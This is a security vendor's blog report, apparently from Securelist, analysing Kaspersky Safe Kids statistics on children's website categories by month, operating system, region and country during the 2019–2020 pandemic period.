Technology is what is saving us from a complete change in the way of life in a world of a raging pandemic. It keeps the educational process going, relieves the shortage of human communication and helps us to live life as fully as possible given the isolation and social distancing. Many adults, and children too, have come to realize that the computer is not just a means of entertainment, but an important tool for education, communication and personal growth.

In this article, we look at changes that occurred in children’s behavior on the Web over the past year and the pandemic period. The report is based on statistics gathered by Kaspersky Safe Kids, a software solution that protects children from unwanted content on the Internet.

How we collect our statistics

Kaspersky Safe Kids scans the contents of a Web page the child is trying to access. If the site falls into one of fourteen undesirable categories, the module sends an alert to Kaspersky Security Network. No user’s personal information is transmitted and neither is privacy compromised.

We will note two important points:

  • It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. But anonymous statistics are collected for all the 14 categories.
  • Data is harvested only from computers running Windows and macOS; no mobile statistics are provided in this report.

Website categorization

Kaspersky Safe Kids filters Web content according to the following categories:

In this article, we will take a closer look at the most-visited categories for the past year. We have combined the less popular ones into a separate category, with their share of alerts marked as “Other”.

Picture of the world

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020 (download)

Children around the world have spent increasingly more time watching videos and listening to music. Software, Audio, Video accounted for nearly forty percent of all Safe Kids alerts over the past year. It was followed by Internet Communications with 24.16 percent and Video Games with 15.98 percent. Online stores were fourth in popularity with 11 percent and News were fifth with 5.54 percent.

Interestingly, Job Search sites with 0.89 percent attracted far more interest from teenagers than Adult Content with 0.74 percent.

Kaspersky Safe Kids Windows and macOS alerts distribution by category in June 2019 through May 2020 (download)

Windows users spent more time watching videos, gaming and reading news than macOS users. The latter preferred chatting and spent much more time shopping online. That said, the adult content Windows users watched on the average more frequently during the year.

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020 (download)

The pandemic forced kids to study at home, attending classes online, and we have seen how this affected their time at the computer. They less frequently visited gaming sites starting at the beginning of the year, even when compared with the September 2019 low of 16.75 percent: the figure fell to 13.26 percent in May. Meanwhile, Internet Communications showed a slight growth in April exceeding the October 2019 high by 0.85 p.p. to reach 27.51 percent.

Children visited online stores the most in the October of 2019. The category accounted for 16.93 percent of all alerts. The popularity of online shopping has steadily decreased since then, dropping by 7.57 p.p. to 9.3 percent by April, but May saw it rebound slightly. Adult Content grew somewhat (by about 0.5 p.p.) in winter, then returned to the summer 2019 levels (0.49 percent) in May.

The graph shows an abnormal drop in visits to Software, Audio, Video websites  in October. The most likely cause can be considered to be the new macOS version, Catalina, released on October 7. Users who installed the update faced issues with streaming video on YouTube, Netflix, Amazon Prime and many other sites. The issue affected not just the Safari browser, but Google Chrome, Opera and Firefox as well. It was fixed in November, a fact that the statistics reflect.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on macOS in June 2019 through May 2020 (download)

Differences across regions, countries and months

Let us take a closer look at the most popular categories by region and by country to see if children’s preferences changed during the pandemic.

Software, audio, video

Software, Audio, Video has remained ahead of Internet Communications in recent years: kids have used Windows and macOS computers for watching videos and listening to music, but switched to mobile devices to chat. The category has retained its popularity even through the lockdown and online studies.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020 (download)

According to KSN statistics for the first half of 2020, Software, Audio, Video began to grow worldwide, reaching a peak of 42.47 percent on all platforms by May.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020 (download)

We explained the decrease in the category’s share on macOS in the fall and winter with issues stemming from an operating system update. As for the decline among Windows users around the same time, it was offset by increasing interest in other categories of sites, for instance, E-Commerce.

By the end of the reporting period, the share of Software, Audio, Video had increased among Windows users, whereas children using macOS began watching videos less frequently by May.

Kids in South Asia (India, Bangladesh) were most likely to spend their time watching videos and listening to music (46.16 percent). It was followed by Africa with 44.75 percent and the CIS with 43.83 percent.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by region in June 2019 through May 2020 (download)

The category had the lowest share in North America (36.20 percent) and Europe (35.94 percent). As we will see below, children in these regions gave preference not only to watching videos, but video games as well.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS by region in June 2019 through May 2020 (download)

In Asia and South Asia, children who used macOS were more likely to consume audio and video content than those who used Windows. In other regions, the category’s Windows share was higher than macOS. In the CIS countries, children’s behavior was nearly identical on the two operating systems.

Interestingly, the distribution of countries where the share of Software, Audio, Video was the largest differs slightly from the regional breakdown.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by country in June 2019 through May 2020 (download)

Children in Belarus (50.59 percent), Japan (49.67 percent), Saudi Arabia (49.54 percent) and India (47.66 percent) favored websites that offered video and music over the past year. YouTube was the most popular video streaming service with kids anywhere in the world.

Online communication

Internet Communications predictably peaked at 27.45 percent in April 2020 as the process of switching schoolchildren to distance learning completed in most countries.

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020 (download)

We observe a pronounced growth from 17.87 percent in June 2019 to 36.63 percent in May 2020 on desktop computers and laptops running macOS. October’s peak was due to a reduction in the share of Software, Audio, Video category following the macOS update.

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020 (download)

Internet Communications accounted for an average of 32.76 percent, with 32.17 percent in Latin America and 30.54 percent in the CIS, and the lowest recorded shares being 15.50 percent in Europe and 16.58 percent in Oceania.

Kaspersky Safe Kids alerts distribution for Internet Communications by region in June 2019 through May 2020 (download)

Kaspersky Safe Kids alerts distribution for Internet Communications by country on the average in June 2019 through May 2020 (download)

The largest proportions of children using personal computers for internet communication were recorded in Egypt, Kenya, Mexico and Russia. The lowest rates were recorded in Germany, Australia, the UK and Canada.

Starting at the beginning of 2020, the most popular sites in the Internet Communications category were skype.com, hangouts.google.com, web.whatsapp.com, meet.google.com, facebook.com, twitter.com and mail.google.com.

Computer games

Despite the fact that the share of Video Games alerts showed a downward trend in the first half of 2020, the category ranked third among the most popular website topics.

Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020 (download)

Kids spent more times playing video games on Windows than macOS desktop computers and laptops. This is due to the fact that most computer games are released for the Windows operating system. However, by the end of the reporting period, macOS users’ interest in games had grown.

Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020 (download)

Kids all around the world started visiting gaming sites less frequently, though. This can be explained by added activity in the form of school lessons, which relocated into the home due to the pandemic. Interestingly, the share of Video Games began to decline among Windows users starting in the fall of 2019.

While North America, Europe and Oceania did not show increased activity in Internet Communications and Software, Audio, Video, these regions had the highest shares of Video Games activity.

Kaspersky Safe Kids alerts distribution for Video Games by region in June 2019 through May 2020 (download)

According to our statistics, the UK had the highest proportion of children interested in games with 23.94 percent, followed by the US with 21.61 percent and Australia with 20.94 percent. The most popular Video Games sites in the UK and the US were blizzard.com, roblox.com, epicgames.com, discordapp.com, ubi.com, origin.com, friv.com, curseforge.com, minecraftmods.com and crazygames.com. Australia’s most popular sites in the category were roblox.com and a variety of Minecraft message boards.

Kaspersky Safe Kids alerts distribution for Video Games by country in June 2019 through May 2020 (download)

E-Commerce

E-Commerce is another category where we observed increased activity throughout the year.

Kaspersky Safe Kids alerts distribution for E-Commerce in June 2019 through May 2020 (download)

The October 2019 peak, as we said earlier, was associated with a disruption in percentage shares across categories on all platforms due to a malfunction in the new macOS. But, in November and December, kids’ interest in online shopping was also higher than in the other months. Which is not surprising: November is the time of the Black Friday sales around the world, and December typically sees everyone busy picking Christmas and New Year’s presents.

Kaspersky Safe Kids alerts distribution for E-Commerce on Windows and macOS in June 2019 through May 2020 (download)

Children who used macOS spent much more hours looking at online shopping windows than their peers who used Windows.

Kaspersky Safe Kids alerts distribution for E-Commerce by region in June 2019 through May 2020 (download)

Children in Europe, North America and Oceania visited online stores and showed interest in shopping more frequently than others. The CIS, Asia and Latin America showed the lowest activity rates in the world.

Kaspersky Safe Kids alerts distribution for E-Commerce by country in June 2019 through May 2020 (download)

The leaders by share of visits to online stores were children in Germany (19.51 percent), the UAE (17.22 percent) and Canada (15.86 percent). The lowest figure was recorded in Kazakhstan (4.60 percent) and Egypt (5.18 percent).

The most visited sites in Germany were amazon.de, otto.de, ebay.com; in the UAE, amazon.ae, panemirates.com, amazon.com and luluhypermarket.com; and in Canada, amazon.ca, visions.ca and bestbuy.ca.

News

Not just adults, but kids, too, showed interest in news, especially in light of recent events. The number of children’s visits to news websites grew around the world as coverage of the pandemic began. The peak (7.26 percent) fell on March, when most children were switched to distance learning.

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020 (download)

Windows users, in general, showed more interest in news than those who used macOS. However, in February, the figure for macOS (7.25 percent) was higher than that for Windows (6.75 percent).

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020 (download)

Kaspersky Safe Kids alerts distribution for News by region in June 2019 through May 2020 (download)

The largest share of News among Safe Kids users was recorded in Europe (11.11 percent), where the most active news-reading countries were the UK (14.14 percent), Germany (12.75 percent), France (10.97 percent) and Italy (10.25 percent). The lowest rate was recorded in the CIS (3.17 percent) and Africa (3.96 percent).

Kaspersky Safe Kids alerts distribution for News by country in June 2019 through May 2020 (download)

Interest in news peaked in the UK and in Italy at in February. Think of the fact that the transition to distance learning in these two countries took place in late February, whereas Germany and France went through the transition in early March, and interest in news there peaked in March, too.

Adult content

Kids were interested in adult content to a lesser extent. According to the global statistics, the popularity of this category peaked in January 2020 (1.12 percent), followed by a decline to the annual average.

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020 (download)

That said, macOS users showed greater interest in pornography than Windows users.

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020 (download)

Though in 2019 Windows accounted for a higher percentage of alerts, the trend changed at the beginning of 2020.

Kaspersky Safe Kids alerts distribution for Adult Content by region in June 2019 through May 2020 (download)

The CIS and Europe had the largest share of users who showed interest in Adult Content: 1.07 percent and 0.83 percent, respectively. The lowest rates were recorded in the Arab world (0.18 percent) and Oceania (0.24 percent).

However, the distribution by country shows that children in Mexico had the highest interest in Adult Content: 1.72 percent.

Kaspersky Safe Kids alerts distribution for Adult Content by country in June 2019 through May 2020 (download)

They were followed by children in Russia (1.06 percent) and France (0.95 percent). Children in China were least likely to access Adult Content on desktop computers: 0.04 percent.

Summary

The world is witnessing an unprecedented demonstration of digital technology primarily helping children develop, rather than impede their development. Online education, and communication with friends and relatives are all made possible only through technology developed in recent decades, which have become not just a day-to-day assistant, but a lifeline in times when leaving home and making personal contact can pose a health threat.

Data for recent months shows that children who are staying at home with constant access to the computer primarily chat and watch videos. And those are not necessarily just entertaining videos: there might be educational content amid that stream of YouTube clips.

This year, we noticed an interesting trend: children who use different operating systems diverge in their online behaviors. Kids who use macOS spend more time in online stores, show slightly more interest in adult content, chat more online and less frequently visit gaming sites. Windows users show greater interest in games and news, and visit websites with video and audio content more frequently.

We have also learned that children, like adults, pay attention to the news when the situation in the world concerns them directly. So, in the month when various countries were expecting to switch to distance learning, kids started to follow the situation closer by going to news sites.

Today’s children, who start interacting with technology at an early age, find moving all of their day-to-day activities online much easier than adults, and they are better adapted to situations where going outside could be life-threatening. Adults tend to question certain online activity, such as communications, but in a world where it is the only safe means of social contact, comes the realization that there may be more to it!

]]>
https://securelist.com/children-report-2020/97191/feed/ 0 full large medium thumbnail